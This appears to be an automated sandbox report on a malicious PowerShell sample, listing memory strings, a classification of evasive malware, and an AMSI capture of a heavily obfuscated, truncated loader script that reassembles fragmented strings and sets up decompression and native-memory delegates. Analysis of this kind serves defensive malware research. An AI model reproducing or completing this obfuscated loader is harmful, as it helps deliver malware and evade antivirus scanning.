Click to jump to signature section
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1647288886.00000206D6704000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1646864953.00000206D4940000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB8E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D6801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D6801000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DCB1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.1647459334.00000206D972B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB8E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DCBA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000000.00000002.1647459334.00000206DB1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1647459334.00000206DC63D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: classification engine | Classification label: mal52.evad.winPS1@2/5@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmvq5uzg.d44.ps1 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress}function RJifNI{$uFmCLB=spBD n e y Y Z A O '3' 6 A t$uFmCLB}function NQQWTC{$DzboKM=DNUnD m T f X e k Y d Z a + A$I9Gps=yxiKVD F c R C$w3sBVT=CmrPR n H '0' 4 W B 4$w3sBVT+$I9Gps+$DzboKM}function cZioCR{$k8fTkh=QvOl 6 I s T c T l l$J4N=SJfQY z K D G w 8 q O 1$zsC=XWtSS I c$NbaR=OWEW 3 I 4 Q b + o S y a d A m 1 7 F$Vtd=hfTYK Y r S h f Q R 9 Y w R y Q T / D$PnkPyh=iduks a h Z X 7 6 L m r c q 8 q e Q$Fy4=Ksmx w 5 v l X 3$lpt9X1=ONwa 4 A 4 Y J j D O 1$NCxFN=dhGzz F A '3'$TVVu6u=WdQxe 7 s w '1' R 3 1$J4N+$NCxFN+$lpt9X1+$PnkPyh+$k8fTkh+$NbaR+$Fy4+$zsC+$Vtd+$TVVu6u}function avSGO{$u6w=OQGoiY D 2 J$IcpD=spBD L m + w k 6 D b t H W$CE1Ir=SJfQY '0' H b r o S e t k$CE1Ir+$IcpD+$u6w}function uUTCU{$wqM=zqlruP t '0' 7 3 U K$SLuv=BdzHu c d W 0$Y9B=oRTe W h$SLuv+$wqM+$Y9B}function BYZCug{$czyzS=uKPNL o l '3'$syUh=ZTpgi Q e e A J c 9 + K C m N U$mfevrq=Ksmx '5' M / b L 2$O4NZ=PopO O r x F 7 O l q$czyzS+$syUh+$mfevrq+$O4NZ}function QJiGV{$Yu8=OilCuY 8 R$L0Jl=pCFso w$ujMN=uKPNL m w K$hWM31K=LouQe G X I J / q x 8 5 y N 9 S p N$Yu8+$ujMN+$hWM31K+$L0Jl}function qgidO{$BvP8k=tzVtgw u 7 g n 8 k k m 3 B j$RoyuKA=KYIC I 3 e 5 7 G M E u O$tFAC=XWtSS X S$tFAC+$BvP8k+$RoyuKA}function pNkr{$jFn8=cGQv r J T Y C C V v a N$itK=WbzGP V I v f G$psPq=WbzGP 9 H G K F$jFn8+$itK+$psPq}function pJcBB{$jpdc=zqlruP J S P O u 8$vbmg=WdQxe j Y t A L b 2$jzz6Y=YUnyc N o w F E 1 / d$jzz6Y+$vbmg+$jpdc}function BMsEVA{$l2a=vSEg z h 6 n D G H + l v 8$H3NF=BdzHu + t A 2$Kva=oRTe 4 z$cSQY=Ksmx r K l b J 4$Kva+$l2a+$cSQY+$H3NF}function Ksmx{Param ($xgw,$z03,$XqdihX,$KPheN,$XprR,$jC07H)$xgw+$z03+$XprR+$KPheN+$XqdihX+$jC07H}function cafd{$t0dB=OilCuY B '3'$nIe7=OGtwG G y H m T 2 + S p t j C 2 t o E$VkDYF9=CmrPR y B B d X 0 P$oQqLQ=oRTe Z s$nIe7+$oQqLQ+$t0dB+$VkDYF9}function Mntx{PgSJf @([IntPtr],[UInt32],[IntPtr],[IntPtr],[UInt32],[IntPtr])([IntPtr])}function iwmW{ZRMNmz (OYdlZ) (iTQRxE) (iZOZu) (rCyr) (hTqub) (exjPD) (yeGKm)}function Cfkz{$VbO=BsstOx u H K f K u s + 6 0 l p q H$C0zi=xKKWi B A s + h t 8 + d w 5 8 / 7$pkfhr=LIvfS u Y l n Y F z k q d F R b$JOA=hfTYK Q D W 9 s B Q q q 1 c s s T n L$WEy=uKPNL D C /$CpR9F=ShdcP c b 0 M G J m Q V e$emDfS=spBD 1 p g a H 8 D T 0 R 0$k8JaZ=spBD w r 1 b O B q n B m Q$YsQ9=ojLID T v r G 6$VYN=CYuwR 0 o n k W l C d X y$aiyBHZ=uKPNL 0 i Z$h0x5LX=KdtA h S K V 0 V G C$k8JaZ+$C0zi+$CpR9F+$VbO+$aiyBHZ+$YsQ9+$VYN+$emDfS+$pkfhr+$JOA+$WEy+$h0x5LX}function ZCIT{$FKYu=fFKt e a t L P I$nKSFT6=dlBUn m '6' d P |